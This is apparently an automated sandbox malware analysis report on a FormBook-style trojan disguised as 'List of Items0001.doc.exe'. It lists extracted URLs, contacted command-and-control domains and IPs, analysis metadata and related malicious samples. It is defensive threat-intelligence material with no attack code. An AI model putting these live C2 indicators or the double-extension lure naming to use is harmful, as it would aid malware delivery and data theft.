                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/Free_Giveaways.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQBFu0TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/Free_Soap_Coupons.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQBTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000000.677563487006.000000000C94C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000009.00000000.677560796859.000000000C352000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C352000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.chalet-tofane.net:80/ytc6/?Nze=C0klVT&amp;7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMByTapiUnattend.exe, 00000005.00000002.677677825516.000000000561C000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.00000000162DC000.00000004.00000001.00040000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/sk-logabpstatus.php?a=dllsNHYvUDhjZEJYL2NwTFExWE1WdXllTFA1bTJkaDRkRETapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://gemini.google.com/app?q=TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.coFoexplorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/X6explorer.exe, 00000009.00000000.677551987614.00000000090FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000090FD000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=mexplorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://htmlcodex.comTapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dts.gnpge.comexplorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://wamuk.org/fList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://windows.msn.com/shellexplorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/__media__/design/underconstructionnotice.php?d=brainchainllc.onlineTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://wamuk.org/jList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.consentmanager.netfirefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://wamuk.org/css/NxTelX253.bineList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEMexplorer.exe, 00000009.00000000.677560796859.000000000C352000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C352000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DTapiUnattend.exe, 00000005.00000002.677677825516.0000000005166000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.00000000038F6000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015E26000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.microexplorer.exe, 00000009.00000000.677553291897.0000000009580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678885890827.0000000002B90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677554073945.000000000A8D0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/sports/blended?market=en-lexplorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgexplorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C506000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C506000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdList of Items0001.doc.exe, 00000003.00000001.673959496421.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgzexplorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://x1.c.lencr.org/0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://x1.i.lencr.org/0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://c.pki.goog/r/r1.crl0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://windows.msn.cn/shellRESPexplorer.exe, 00000009.00000002.678915471542.000000001040B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565765377.000000001040B000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.coexplorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/pics/28903/search.png)TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/sports/blend%explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://login.partner.microsoftonline.cn/RESPQSexplorer.exe, 00000009.00000002.678916040962.00000000105C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566217210.00000000105C7000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            62.149.128.40
                            		chalet-tofane.netItaly
                            		31034ARUBA-ASNITfalse
                            209.74.95.29
                            		www.onetoph.xyzUnited States
                            		31744MULTIBAND-NEWHOPEUStrue
                            154.212.219.2
                            		www.prj81oqde1.buzzSeychelles
                            		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                            206.119.82.131
                            		wdcb30.topUnited States
                            		174COGENT-174USfalse
                            134.119.247.136
                            		www.new-wellness.netGermany
                            		34011GD-EMEA-DC-CGN1DEfalse
                            13.76.137.44
                            		xzwp.g.zxy-cname.comUnited States
                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            221.121.144.149
                            		inf30027group23.xyzAustralia
                            		45671AS45671-NET-AUWholesaleServicesProviderAUtrue
                            208.91.197.27
                            		www.brainchainllc.onlineVirgin Islands (BRITISH)
                            		40034CONFLUENCE-NETWORK-INCVGfalse
                            206.119.82.147
                            		wdeb18.topUnited States
                            		174COGENT-174USfalse
                            85.153.138.113
                            		www.mfgarage.netTurkey
                            		12946TELECABLESpainESfalse
                            172.81.61.224
                            		www.moritynomxd.xyzUnited States
                            		22552ESITEDUStrue
                            162.213.195.46
                            		wamuk.orgUnited States
                            		394727NODISTOUSfalse
                            3.33.130.190
                            		leadlikeyoumeanit.xyzUnited States
                            		8987AMAZONEXPANSIONGBtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1516506
                            Start date and time:2024-09-24 11:23:13 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 17m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:3
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:List of Items0001.doc.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@7/12@22/13
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 85
                            • Number of non-executed functions: 299
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • Excluded domains from analysis (whitelisted): self.events.data.microsoft.com, nexusrules.officeapps.live.com
                            • Execution Graph export aborted for target MzAJhEkohQv.exe, PID 3032 because it is empty
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            05:26:34API Interceptor28103795x Sleep call for process: TapiUnattend.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            62.149.128.40Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                            • www.chalet-tofane.net/uesf/
                            PO76389.exeGet hashmaliciousFormBookBrowse
                            • www.fimgroup.net/f3w9/
                            bintoday1.exeGet hashmaliciousFormBookBrowse
                            • www.fimgroup.net/m3ft/
                            Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                            • www.fimgroup.net/fqzh/
                            file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                            • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                            64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                            • www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
                            09090.exeGet hashmaliciousFormBookBrowse
                            • www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                            8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                            • www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
                            98790ytt.exeGet hashmaliciousFormBookBrowse
                            • www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
                            aertrh.exeGet hashmaliciousFormBookBrowse
                            • www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
                            209.74.95.29PO2024033194.exeGet hashmaliciousFormBookBrowse
                            • www.sterkus.xyz/ha8h/
                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                            • www.pofgof.pro/gfz9/
                            154.212.219.2Enquiry.exeGet hashmaliciousFormBookBrowse
                            • www.prj81oqde1.buzz/6wpo/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            xzwp.g.zxy-cname.comRequest for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                            • 52.230.28.86
                            SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                            • 13.76.139.81
                            www.new-wellness.netRECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                            • 134.119.247.136
                            www.moritynomxd.xyzPO2024033194.exeGet hashmaliciousFormBookBrowse
                            • 172.81.61.224
                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                            • 172.81.61.224
                            www.prj81oqde1.buzzEnquiry.exeGet hashmaliciousFormBookBrowse
                            • 154.212.219.2

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            COMING-ASABCDEGROUPCOMPANYLIMITEDHKEnquiry.exeGet hashmaliciousFormBookBrowse
                            • 154.212.219.2
                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                            • 154.212.231.82
                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                            • 154.212.231.82
                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                            • 154.212.231.82
                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                            • 154.212.231.82
                            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                            • 154.209.181.231
                            firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                            • 154.197.250.178
                            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                            • 156.224.150.249
                            BZhkYlDV8q.msiGet hashmaliciousUnknownBrowse
                            • 202.61.85.225
                            T9PdSCKZ1F.msiGet hashmaliciousUnknownBrowse
                            • 202.61.85.225
                            COGENT-174USBL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                            • 154.23.184.141
                            https://cq5vm0t6.r.ap-south-1.awstrack.me/L0/https:%2F%2FLq80gs39wzn7cEJYS7QxVo93bIB.cmap.com.mx%2Fxianzjdjh%2Fvjvituyuhg%2Ffugurvihd%2FcnN0ZXBhbkBzdGVwYW4uY29t/1/0109019220636f55-7ee4148e-cca2-44ad-bd25-6ee1a4a237c9-000000/O3lzw3DZZGc8Aai1RaO7S2RLaAo=173Get hashmaliciousHTMLPhisherBrowse
                            • 38.98.69.175
                            SecuriteInfo.com.Trojan-Dropper.Win32.Agent.tjawiq.27210.15987.exeGet hashmaliciousUnknownBrowse
                            • 154.21.14.89
                            https://primesportnews.co.uk/Get hashmaliciousUnknownBrowse
                            • 38.98.69.175
                            Enquiry.exeGet hashmaliciousFormBookBrowse
                            • 206.119.82.134
                            ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                            • 154.21.81.142
                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                            • 38.47.232.196
                            http://xb2.aggressiveq9.com/21u/Get hashmaliciousHTMLPhisherBrowse
                            • 143.244.208.184
                            q8HkBndUpP.exeGet hashmaliciousUnknownBrowse
                            • 38.175.45.11
                            yoYRK88Xg2.exeGet hashmaliciousUnknownBrowse
                            • 38.175.45.20
                            MULTIBAND-NEWHOPEUSPO2024033194.exeGet hashmaliciousFormBookBrowse
                            • 209.74.95.29
                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                            • 209.74.95.29
                            Untitled.emlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                            • 209.74.66.140
                            Untitled.emlGet hashmaliciousUnknownBrowse
                            • 209.74.66.140
                            EF520_B18Payment_2600_D3781_N3895_L1029_H482_X4782_E3819.exeGet hashmaliciousUnknownBrowse
                            • 209.74.95.146
                            https://lookerstudio.google.com/s/u2hbu8O7xHgGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                            • 209.74.66.141
                            ibero.batGet hashmaliciousSilverRatBrowse
                            • 209.74.95.136
                            CY51PaymentAUG-38122-507-783-17531I-39UW-J471-3017-3C762-M732.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            • 209.74.95.146
                            H#Payment03-28S2-J5892-C938-KL105-DN782-FN823-CD47912-SC8923-19574.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            • 209.74.95.146
                            X4kQxc5ZQWGet hashmaliciousUnknownBrowse
                            • 209.74.85.117
                            ARUBA-ASNITPayment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                            • 62.149.128.40
